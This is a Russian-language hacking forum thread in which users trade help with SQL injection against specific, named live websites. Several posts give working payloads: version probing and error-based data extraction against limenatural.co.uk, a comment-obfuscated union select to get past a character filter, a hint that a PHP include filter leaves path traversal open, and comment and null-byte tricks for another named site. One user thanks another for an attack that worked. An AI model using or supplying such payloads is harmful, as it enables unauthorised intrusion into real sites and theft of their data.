Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. SeNaP

    SeNaP Elder - Старейшина

    Joined:
    7 Aug 2008
    Messages:
    378
    Likes Received:
    69
    Reputations:
    20
    MSSQL :(

    А с чего ты тогда вообще взял, что там SQL inj?
     
  2. Darren

    Darren Banned

    Joined:
    14 Jun 2008
    Messages:
    34
    Likes Received:
    5
    Reputations:
    6

    нет когда нет поля он пишет.

    Microsoft OLE DB Provider for ODBC Drivers error '80004005'
    [TCX][MyODBC]Unknown column 'admin' in 'field list'

    Развожу руками((
     
    #11522 Darren, 22 Feb 2010
    Last edited: 22 Feb 2010
  3. B1t.exe

    B1t.exe Elder - Старейшина

    Joined:
    6 Nov 2006
    Messages:
    1,020
    Likes Received:
    128
    Reputations:
    23
    SeNaP

    да не откуда, просто пошел интерес и хочется что то понять в это деле. Думал нашел нить и можно цеплятся, а вот облом :(
     
  4. SeNaP

    SeNaP Elder - Старейшина

    Joined:
    7 Aug 2008
    Messages:
    378
    Likes Received:
    69
    Reputations:
    20
    Читай с начало
     
  5. l1ght

    l1ght Elder - Старейшина

    Joined:
    5 Dec 2006
    Messages:
    191
    Likes Received:
    678
    Reputations:
    333
    mysql, причем http://www.limenatural.co.uk/prod1.asp?ID=1+or+substring(version(),1,1)=4
     
    3 people like this.
  6. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    Code:
    http://www.limenatural.co.uk/prod1.asp?ID=1+or+(1,1)=(select+count(0),concat((select+version()),floor(rand(0)*2))+from(orders)+group+by+2)
     
    4 people like this.
  7. 3blK0B

    3blK0B Member

    Joined:
    28 Sep 2009
    Messages:
    8
    Likes Received:
    8
    Reputations:
    9
    Спасибо, l1ght! Все работает! А то хотел уже прыгать с моста... С меня креда!
     
  8. scorpic393

    scorpic393 Banned

    Joined:
    5 Feb 2010
    Messages:
    59
    Likes Received:
    4
    Reputations:
    3
    Возможно ли обойти ?

    PHP:
    if (isset($_GET['pagina'])) 
    {     
        
    $tmp $_GET['pagina']; 
        
    $tmp1 = (eregi_replace("['<>(){}!$%&+@|;'\]","",$tmp));
     
  9. warlok

    warlok Elder - Старейшина

    Joined:
    17 Feb 2008
    Messages:
    328
    Likes Received:
    142
    Reputations:
    81
    Code:
    1/**/union/**/select/**/table_name/**/information_schema.tables/**/limit/**/1,1
    
    Что то типа такого, можно ведь обойтись спокойно и без того что там фильтруется если скуля стандартная. Если хотел воспользоваться теми символами что там режутся то в этой статье упоминается про eregi, так что смею предположить что в новых версиях php это не актуально в отличии от ereg.
     
    1 person likes this.
  10. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,520
    Likes Received:
    401
    Reputations:
    196

    точки и слеша в регулярке нет - спокойно можно их юзать, ведь там инклюд же, судя по названию пеерменной :)
     
    2 people like this.
  11. ILYAtirtir

    ILYAtirtir Elder - Старейшина

    Joined:
    25 Apr 2007
    Messages:
    142
    Likes Received:
    246
    Reputations:
    73
    На запрос посмотрите:
    Тут только как слепую крутить.
     
  12. ILYAtirtir

    ILYAtirtir Elder - Старейшина

    Joined:
    25 Apr 2007
    Messages:
    142
    Likes Received:
    246
    Reputations:
    73
    ...
     
    3 people like this.
  13. Дирижабль

    Дирижабль [ ✯✯✯ Ядерный Суицид ✯✯✯ ]

    Joined:
    6 Jan 2010
    Messages:
    369
    Likes Received:
    346
    Reputations:
    292
    Тут совсем не похоже на Injection так, иле всетаки можно прокрутить?

     
  14. Darren

    Darren Banned

    Joined:
    14 Jun 2008
    Messages:
    34
    Likes Received:
    5
    Reputations:
    6
    Может ли существовать фильтрация на выходе
    www.************.com/index.php?eid=1+union+select+ID+from+users --
    подбирая таблицы и строки пришёл к тому что 100% существуют эта таблица и строка
    Может ли быть фильтрация на выходе, потому что после того как я делаю этот запрос выходит окно , как будто без юнион селекта, но без вывода необходимых мне данных.
     
  15. FAQ666

    FAQ666 Elder - Старейшина

    Joined:
    17 Sep 2008
    Messages:
    38
    Likes Received:
    18
    Reputations:
    8
    Почему при запросе http://site/traw/4602'--+/
    SELECT * FROM tse_articles WHERE id='4602'--+'

    You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1

    Пробовал много вариантов все равно одно и тоже
     
  16. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    Используй комментарий %23
     
  17. FAQ666

    FAQ666 Elder - Старейшина

    Joined:
    17 Sep 2008
    Messages:
    38
    Likes Received:
    18
    Reputations:
    8
    Пробовал) не помогает
     
  18. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,520
    Likes Received:
    401
    Reputations:
    196
    /*%00 попробуй
     
    1 person likes this.
  19. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    лучше всегда пробовать ссылку сразу давать
     
  20. FAQ666

    FAQ666 Elder - Старейшина

    Joined:
    17 Sep 2008
    Messages:
    38
    Likes Received:
    18
    Reputations:
    8
    http://www*materinstvo*ru/art/4610'/
     
Thread Status:
Not open for further replies.